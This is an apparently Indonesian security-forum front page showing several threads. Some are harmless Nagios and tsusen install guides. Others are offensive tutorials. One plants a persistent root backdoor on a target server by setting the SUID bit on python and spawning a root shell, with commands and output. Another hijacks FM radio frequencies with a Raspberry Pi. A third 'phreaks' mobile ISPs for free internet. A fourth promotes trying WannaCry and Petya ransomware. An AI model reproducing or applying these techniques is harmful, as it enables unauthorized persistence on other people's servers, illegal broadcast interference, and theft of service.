Welcome, Guest
You have to register before you can post on our site.

Username
  

Password
  





Search Forums

(Advanced Search)

Forum Statistics
» Members: 1,141
» Latest member: ramphax
» Forum threads: 190
» Forum posts: 948

Full Statistics

Online:
There are currently 10 online users.
» 0 Member(s) | 10 Guest(s)

Latest Threads
BackBox tidak bisa mati (...
Forum: Support
Last Post: frdynurm
02-11-2018, 03:55 PM
» Replies: 0
» Views: 126
MEDUSA Couldn't load "ssh...
Forum: Support
Last Post: koboi
01-30-2018, 11:10 AM
» Replies: 1
» Views: 475
Tanam rootkit tanpa menam...
Forum: Maintaining Access
Last Post: purplepinger
01-05-2018, 06:16 PM
» Replies: 1
» Views: 1,934
Hacknet - Game tentang ha...
Forum: Gaming
Last Post: purplepinger
01-05-2018, 06:14 PM
» Replies: 2
» Views: 2,505
Salam Kenal
Forum: Introductions
Last Post: RORIORIO
01-01-2018, 09:09 AM
» Replies: 96
» Views: 27,127
CRUD Dengan C++
Forum: C and C++ Programming
Last Post: penjagalilin
12-16-2017, 12:48 AM
» Replies: 1
» Views: 2,079
Create Your Own KeyLogger...
Forum: Exploitation
Last Post: Cesaakbar
12-13-2017, 12:35 AM
» Replies: 3
» Views: 3,550
Membajak frekuensi radio ...
Forum: Exploitation
Last Post: Hightech
12-11-2017, 05:51 AM
» Replies: 1
» Views: 1,793
VPN GRATIS Dengan Layanan...
Forum: Networking
Last Post: penjagalilin
11-18-2017, 04:26 AM
» Replies: 0
» Views: 1,753
Phreaking with OpenWRT
Forum: Networking
Last Post: penjagalilin
11-13-2017, 05:50 AM
» Replies: 2
» Views: 1,902

 
  BackBox tidak bisa mati (shutdown malah jadi restart)
Posted by: frdynurm - 02-11-2018, 03:55 PM - Forum: Support - No Replies

ada yang ngalamin kaya gini? share dong udah ane coba edit grub nya tapi tetep aja , matiin pake init 0 ,shutdown juga hasilnya sama

Print this item

  MEDUSA Couldn't load "ssh" bagaimana cara ngatasinnya ?
Posted by: ngent0t - 01-17-2018, 06:25 AM - Forum: Support - Replies (1)

[Image: as.png]

Print this item

  Membajak frekuensi radio menggunakan raspberry pi dan kawat
Posted by: koboi - 12-10-2017, 07:11 AM - Forum: Exploitation - Replies (1)

Okay gus kali ini saya akan coba sedikit sharing ilmu mengenai frekuensi..
Sebelum memasukin isi threads kali ini saya ingin menyampaikan DISCLAIMER terlebih dahulu..

Karena pembahasan kali ini agak sedikit melanggar aturan yang ada di negeri ini, harapan saya dengan adanya thread kali ini tidak ada orang yang menyakalahgunakan cara yang saya share di sini. Thread ini sifatnya adalah untuk pembelajaran saja, kalo ada orang yang menyalah gunakan cara yang telah di share di thread ini saya tidak bertanggung jawab. Karena di sini saya niatnya untuk membagikan ilmu pengetahuan kepada siapa saja yang ingin bejalar di forum ini.

Okay tanpa basa basi lagi saya akan coba praktekkan langkah" nya.
Sebelum masuk ke materi kali ini kita harus siapkan terlebih dahulu "Raspberry pi" dan "Kawat" nya. Kalo belum punya, kita bisa beli di toko online seperti tokopedia dll.

Setelah kita mempersiapkan raspberry nya kita coba install aplikasi untuk mengirim suara ke dalam frekuensi namanya yaitu fm_transmiter
Untuk cara installasinya cukup mudah, kita cukup ketikan perintah ini di terminal raspberry pi kita.

Code:
$ sudo apt-get install make gcc g++
$ git clone https://github.com/markondej/fm_transmitter
$ cd fm_transmitter
$ sudo make
$ sudo cp fm_transmitter /usr/bin/fm_transmitter

Setelah fm_transmitter nya terinstall di raspberry, langkah selanjutnya kita tempelkan kawat besi atau tembaga ke dalam pin "GPIO 4" raspberry pi nya. Kalo kurang jelas bisa di lihat di sini skemanya.

[Image: yWGmW.png]

Setelah itu kita eksekusi saja tools yang sudah kita install tadi. Sebagai contoh, perintahnya seperti ini

Code:
$ sudo fm_transmitter -f 103.800 -r sound.wav

Penjelasan:
-f = Frekuensi yang akan kita injeksi
-r = Nama file yang akan kita transmit ke frekuensi

Cukup mudah bukan caranya??
Kalo kalian kurang jelas dalam penggunaan nya bisa lihat video di bawah ini.





Okay mungkin seperti itu cara yang bisa kita lakunan untuk membajak frekuensi radio menggunakan raspberry pi.
Mohon maaf kalo ada kata yang kurang jelas.
Akhir kata, wasalam =))

Print this item

  Tanam rootkit tanpa menambahkan file/rootkit ke dalam server
Posted by: koboi - 11-18-2017, 10:25 AM - Forum: Maintaining Access - Replies (1)

Oke kali ini saya coba sharing trik sederhana cara menanam rootkit tanpa upload rootkit/file ke dalam server.
Gimana caranya?? Ko bisa?? Penasaran bukan??

Mungkin bagi kalian yang terbiasa menggunakan python trik ini sangatlah mudah dan sangat sederhana, kita tinggal menambahkan hak akses sticky bit ke dalam suatu file. Dalam contoh kali ini saya menambahkan hak akses sticky bit ke dalam file python sendiri.
Caranya cukup mudah, kita tinggal ketikan perintah "chmod +s" menggunakan user root. Sebagai contoh perintahnya seperti ini

Code:
$ chmod +s /usr/bin/python2.7

Lalu apa yang harus kita lakukan setelah merubah hak akses file tersebut??
Caranya kita tinggal masuk ke shell interactive python kemudian kita setuid menjadi 0. Perintahnya kurang lebih seperti ini

Code:
$ id
uid=1000(user) gid=1000(user) groups=1000(user)
$ python
Python 2.7.14 (default, Sep 23 2017, 22:06:14)
[GCC 7.2.0] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import os
>>> os.setuid(0)
>>> os.setgid(0)
>>> os.system('id')
uid=0(root) gid=0(root) groups=0(root),1000(user)
>>> os.system('/bin/bash')
$ id
uid=0(root) gid=0(root) groups=0(root),1000(user)

Cukup mudah bukan??
Sebelumnya saya pernah share juga cara menanam rootkit ke dalam server dengan mengupload program suid di sini. Kali ini caranya cukup sederhana banget bukan. :)

Catetan : karena kita menambahkan hak akses ke dalam program python, kita harus cek terlebih dahulu apakah di server target sudah terinstall python atau belum. kalo belum kita tinggal install saja pythonnya, kan udah dapet akses rootnya??
Atau kalo kalian pengen nginjeksi ke perl, bash, atau yang lainnya juga bisa ko :) tinggal atur" aja enaknya kita simpen di mana rootkit. hehe

Mungkin cukup sekian tutorial dari saya.
Semoga tutorialnya bermanfaat. :)

Print this item

  VPN GRATIS Dengan Layanan PORT FORWARDING
Posted by: penjagalilin - 11-18-2017, 04:26 AM - Forum: Networking - No Replies

Sudah banyak yang tahu tentang NGROK kan? Yah, Ngrok memang gratis. Tapi amat disayangkan port Ngrok selalu berganti bagi user gratisan. Solusinya adalah dengan menggunakan TUNNEL.MY.ID
Jika tidak salah, situs TUNNEL.MY.ID ini dibuat oleh KangArie.




Q&A

Q: Untuk siapa layanan vpn port forward, vpn interkoneksi, dan HTTP reserve proxy?

A: Untuk router yang koneksi internetnya tidak memiliki akses ke IP Public





Q: Apa contoh router yang ga dpt akses ke IP public?

A: Pengguna Modem GSM/CDMA, pengguna wifi.id, client rt/rw net





Q: Ini untuk internet gratis atau menghemat quota?

A: Bukan





Q: Ini untuk traffic keluar, misal utk main game atau browsing atau ganti ip public?

A: Bukan





Q: Apakah ada quota utk tunnel DNS?

A: Tidak ada





Q: Kapan akun vpn akan dihapus?

A: Jika anda free member, maka sistem akan menghapus akun vpn jika selama seminggu vpn tidak aktif





Q: Apakah layanan ini gratis?

A: Ya, server US free. Sedangkan server ID berbayar. Untuk DDNS dan Userman gratis



Nah begitulah kira - kira. Ane sempet dokumentasiin dikit pas nyoba buat port forward Apache.
Langsung saja deh kalian simak video dibawah ini.




Oke sekian gitu aja, semoga bermanfaat!

Print this item

  Phreaking with OpenWRT
Posted by: penjagalilin - 11-09-2017, 06:31 PM - Forum: Networking - Replies (2)

Mumpung sedang nganggur dan suntuk gatau mau ngapain, mendingan nulis di forum ya kan. Nulis dikit lah gapapa.
Oke jadi mungkin udah pada ga asing lagi sama yang namanya OpenWRT. Apaan sih? Cari tau aja di situs OpenWRT langsung.
Intinya dengan OpenWRT yang OpenSource ini kita bisa ngerubah router menjadi lebih dari sekedar router, maksudnya router itu bisa dikembangkan lagi, misalnya untuk keperluan IoT Device, Web Server, File Sharing Server, CCTV, Print Server, Music Player Server, Downloader Server, dsb. Nah dalam thread kali ini kita bakalan gunain untuk kepentingan Phreaking (baca: gretongan).

Penampakan HG553

[Image: 23509015_1483883955052357_88306912033964...e=5AA3ADF5]


Kenapa phreaking pake Router ber-OpenWRT?
Phreaking ISP GSM biasanya dilakukan di HP/Komputer. Artinya HP/Komputer perlu nyala terus cuma buat kegiatan phreaking. Dengan melakukan phreaking di router ber-OpenWRT yang memang salah satu tugasnya adalah untuk selalu menyala, maka Laptop udah gaperlu nyala secara nonstop lagi, kasihan kan kalo dipaksa nyala nonstop. Lalu phreaking biasanya menuntut Laptop/HP untuk menjalankan beberapa tools program yang dibutuhkan (misalnya pakai HTTP Injector, Inject PC, Bitvise, KPN Tunnel, Psiphone, dsb) yang tentunya ini bikin risih, sekaligus memakan resource Laptop/HP yang ada, makanya kita pake router ber-OpenWRT supaya Laptop/HP kita tinggal connect saja via WiFi si router (atau kabel LAN) tanpa perlu menjalankan tools program tambahan. Jadi, soal tugas phreaking akan benar-benar didedikasikan oleh si router saja.


Alat :
- Huawei HG553 Wireless Router (WAJIB)
- Sierra312U USB Modem (atau modem lain)
- SIM Card dengan ISP yang lagi bisa dipake gretongan (misal : Tri)
Bahan :
- Firmware LEDE Pulpstone (TUTOR FLASHING)
- Firmware OpenWRT CC Angel Beats (Tutor ada didalam file)
- Akun SSH/VPN (misalnya dari FastSSH)
- Payload

Tata cara flash, jika HG553 kalian masih pakai firmware original :
Flash LEDE Pulpstone pakai opsi Firmware Upgrade > lalu Flash OpenWRT CC Angel Beats

Semua tutor lengkap Flash udah tertera di file firmware yang kalian download diatas, jadi budayakan membaca!



Proof :





Oke sekian seperti itu saja. Semoga bermanfaat.

Print this item

  Cara install tsusen di Ubuntu 16.04/17.04 (Monitoring trafic berbasis web)
Posted by: koboi - 10-22-2017, 04:11 PM - Forum: Server - No Replies

Malam guys..
Kali ini saya akan coba mempraktekan cara install tsusen di dalam web server..
Sebelum masuk ke tutorial ada yang tau tsusen itu apa??

Okay, mungkin saya akan menjelaskan secara singkat mengenai tsusen ini..
Tsusen adalah aplikasi untuk monitoring setiap trafic masuk di dalam port tcp. Aplikasi ini cocok buat kalian yang ingin memperdalam untuk menjadi sysadmin. Di tsusen ini kita bisa memonitoring ip mana saja yang melakukan request masuk yang paling banyak ke dalam web server kita. Untuk informasi lebih lanjut bisa di lihat di github informasinya.

Kita lanjut ke tutorial, caranya cukup mudah kita tinggal ketik perintah ini di console..

Code:
root[~] >> apt-get install git python-pip python-pcapy screen
root[~] >> pip install python-geoip python-geoip-geolite2
root[~] >> git clone https://github.com/stamparm/tsusen

Untuk menjalankannya melalui backgroun kita bisa ketik di terminal menggunakan screen agar si tsusennya bisa terus berjalan saat terminal kita di close. Kurang lebih perintahnya seperti ini.

Code:
root[~] >> screen
root[/root/tsusen] >> cd tsusen/
root[/root/tsusen] >> python tsusen.py

Saat tsusen berjalan, secara default dia akan membuka port 3889
Untuk mengaksesnya kita tinggal buka alamat ip address atau domain di tambah port 3889 di dalam browser.
Contoh alamatnya seperti ini:


Quote:http://backboxindonesia.or.id:3889


Kurang lebih hasilnya akan menjadi seperti ini

[Image: GjiY0RdIQHOXa4Rv3UBCyQ.png]

[Image: M-v2jVRQQtWQsdz_tcSTmw.png]

Mungkin cukup sekian tutor dari saya.
Semoga ilmunya bermanfaat...

Print this item

  Install nagios di ubuntu 16.04/17.04 server
Posted by: koboi - 10-06-2017, 06:43 AM - Forum: Server - No Replies

Perintah untuk install nagios


Code:
user[~] >> sudo su
root[~] >> apt-get install wget build-essential apache2 php apache2-mod-php7.0 php-gd libgd-dev sendmail unzip
root[~] >> useradd nagios
root[~] >> groupadd nagcmd
root[~] >> usermod -a -G nagcmd nagios
root[~] >> usermod -a -G nagios,nagcmd www-data
root[~] >> cd ~
root[~] >> wget https://assets.nagios.com/downloads/nagioscore/releases/nagios-4.3.2.tar.gz
root[~] >> tar -xzf nagios*.tar.gz
root[~] >> cd nagios-4.3.2/
root[~] >> ./configure --with-nagios-group=nagios --with-command-group=nagcmd
root[~] >> make all
root[~] >> make install
root[~] >> make install-commandmode
root[~] >> make install-init
root[~] >> make install-config
root[~] >> /usr/bin/install -c -m 644 sample-config/httpd.conf /etc/apache2/sites-available/nagios.conf
root[~] >> cp -R contrib/eventhandlers/ /usr/local/nagios/libexec/
root[~] >> chown -R nagios:nagios /usr/local/nagios/libexec/eventhandlers
root[~] >> cd ~
root[~] >> wget https://nagios-plugins.org/download/nagios-plugins-2.2.1.tar.gz
root[~] >> tar -xzf nagios-plugins*.tar.gz
root[~] >> cd nagios-plugin-2.2.1/
root[~] >> ./configure --with-nagios-user=nagios --with-nagios-group=nagios --with-openssl
root[~] >> make
root[~] >> make install
root[~] >> nano /usr/local/nagios/etc/objects/contacts.cfg


Edit contact email, contoh


Quote:email budi@backboxindonesia.or.id


Perintah selanjutnya


Code:
root[~] >> a2enmod rewrite
root[~] >> a2enmod cgi
root[~] >> htpasswd -c /usr/local/nagios/etc/htpasswd.users nagiosadmin


Masukan password untuk login nagiosnya
Kemudian ketik lagi perintah di bawah


Code:
root[~] >> ln -s /etc/apache2/sites-available/nagios.conf /etc/apache2/sites-enabled/
root[~] >> nano /etc/systemd/system/nagios.service


Di dalam nano tambahkan script ini


Quote:[Unit]
Description=Nagios
BindTo=network.target


[Install]
WantedBy=multi-user.target

[Service]
User=nagios
Group=nagios
Type=simple
ExecStart=/usr/local/nagios/bin/nagios /usr/local/nagios/etc/nagios.cfg


Selanjutnya masukan perintah ini


Code:
root[~] >> systemctl enable /etc/systemd/system/nagios.service
root[~] >> systemctl apache2 restart
root[~] >> systemctl nagios start
root[~] >> systemctl nagios restart


Testing nagios di browser, contoh alamatnya http://192.168.1.69/nagios/
Kalo muncul popup login berarti nagios sudah kita install.
Setelah itu masukkan username dan password yang telah kita buat tadi. Sebagai contoh


Quote:User : nagiosadmin
Pass : passwordygkitabuattadi


Step selanjutnya menambahkan host di dalam nagios, perintahnya adalah


Code:
root[~] >> apt-get install nagios-nrpe-server nagios-plugins
root[~] >> nano /etc/nagios/nrpe.cfg


Ganti server_address dengan ip address kita


Quote:server_address=192.168.1.69


Masukan perintah ini


Code:
root[~] >> service nagios-nrpe-server restart
root[~] >> nano /usr/local/nagios/etc/objects/baru.cfg


Masukan script ini untuk menambahkan host ke dalam nagios


Quote:define host{
        use                     linux-server
        host_name               Server
        alias                   Server
        address                 192.168.1.2
        }


Perintah selanjutnya adalah


Code:
root[~] >> nano /usr/local/nagios/etc/nagios.cfg


Setelah itu kita tambahkan script ini


Quote:cfg_file=/usr/local/nagios/etc/objects/baru.cfg


Sampai di sini nagios sudah bisa kita gunakan. Untuk perintah selanjutnya kita reload terlebih dahulu nagiosnya sebelum kita buka di browser dengan perintah ini.


Code:
root[~] >> /etc/init.d/nagios restart


Setelah di restart kita buka alamat ini http://192.168.1.69/nagios/ di browser. Dan setelah di tambah beberapa host di config nagios kurang lebih seperti ini tampilannya..

[Image: ZhgX1m5hQ_uQxt6BuGq2LQ.png]

Maaf kalo tutorialnya singkat banget. hehe
Akhir kata, selamat belajar. :)

Print this item

Big Grin Tutorial Testing WannaCry and Petrwrap Petya 2017
Posted by: Habil Moonz - 07-03-2017, 12:32 PM - Forum: Exploitation - No Replies

Ini hanya Tutorial Testing Ransomware yang sekarang lagi booming di Tahun 2017.
Yaitu Ransomware WannaCry dan Petrwrap/Petya.
Gunakan Dengan Resiko Anda Sendiri.
Untuk tujuan pembelajaran saja.
Untuk tujuan pendidikan saja
NOTE : JANGAN DIJAILIN KE ORANG, TEMAN, KE WARNET, ATAU PACAR.
KALO GABISA DECRYPT NYA !!! :V :gerah:lol



Print this item

  Backbox 4.7 amd64 Freeze
Posted by: synalberto - 06-15-2017, 03:00 AM - Forum: Support - Replies (2)

Para master dan para suhu backbox, saya mau meminta bantuan terkait backbox saya.
Kenapa backbox saya sering freeze? saya coba pakai magicsysrq tetapi tetap saja tidak bisa. Netbook tidak bisa diapa-apain, pointer tidak bergerak dan keyboard tidak berfungsi. Selama ini saya mengatasinya dengan force shutdown(tekan tombol power beberapa waktu), kalo saya menggunakan cara ini secara terus menerus saya khawatir hardware saya akan rusak. Tolong tanggapan dan solusi dari para master,suhu, dan teman teman backbox. Terima kasih

Print this item

  • 1
  • 2
  • 3
  • 4
  • 5
  • 20
  • »
  • Jump to page